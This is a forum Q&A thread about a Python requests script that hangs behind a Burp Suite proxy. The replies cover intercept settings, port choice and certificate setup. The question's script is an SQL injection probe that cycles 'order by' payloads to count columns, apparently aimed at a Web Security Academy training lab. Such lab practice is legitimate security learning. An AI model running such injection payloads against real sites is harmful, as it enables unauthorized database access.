# The Python Request module does not function when including a proxy

Tags: python, proxy, request

I have recently tried the python request module and it seems to work fine up until the point when I include a `proxy` in the command. I am using the `Burp Suite` proxy, when I run the code the program gets stuck on the line of code with the `request module`.

```
import requests
import sys
import urllib3

#input = "https://0a0100660376e8efc04b1a7600880072.web-security-academy.net/"
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

def exploit_sqli_column_number(URL):
    path = "filter?category=Tech+gifts"
    for i in range(1,51):
        sql_payload = "'+order+by+%s--" %i
        r = requests.get(url + path + sql_payload, verify = False, proxies = proxies)
        res = r.text
        if "Internal Server Error" in res:
            return i - 1
    return False

if __name__ == "__main__":
    try:
        url = sys.argv[1]
    except IndexError:
        print("[-] Usage: %s <url>" % sys.argv[0])
        print("[-] Example: %s www.example.com" % sys.argv[0])
        sys.exit(-1)




print("[+] Figuring out number of columns.")
num_col = exploit_sqli_column_number(URL)
if num_col:
    print("[+] The number of columns is " + str(num_col)
    + ".")
else:
    print("[-] The SQL Injection was not successful.")
```

I have tried other scripts where I just make the request without using the proxy and it works just fine, I have also checked the `IP address` and the `Port`, so there should be no issues with that.
Thank you for help in advance.

Answer (score 0):

This code works for me:

```
import requests
import sys
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http': 'http://127.0.0.1:8085', 'https': 'https://127.0.0.1:8085'}

r = requests.get('https://www.google.com', verify = False, proxies = proxies)

print(r)
```

I'd make sure you set the correct ports in Burp Suite under Proxy -> Options, and make sure you turn off intercept. If your code is just hanging and not giving any error then the issues is you have not turned off intercept. I would try using a port other than the default 8080 for your proxy.

Comment: I see, but still this does not work, I have progressed with solution on my own and found that the proxy does not work when I use the https://127:0.0.1 address and when trying to connect to it, the browser outputs that This site "can’t provide a secure connection127.0.0.1 sent an invalid response.
Try running Windows Network Diagnostics.
ERR_SSL_PROTOCOL_ERROR".

Comment: That's most likely a browser error, or you don't have certificates set up correctly with Burp Suite.

I would recommend following this video to make sure Burp Suite is set up correctly first.

https://www.youtube.com/watch?v=xKudsnN3gkE

For any of this to work you're going to have to have Burp Suite running with the correct Proxy->Options settings, and then you'd have to browse to 127.0.0.1 with the correct port. Like 127.0.0.1:8085. If that doesn't load you don't have your proxy settings correct in Burp Suite. If it load with a welcome to Burp Suite page you should be good to go.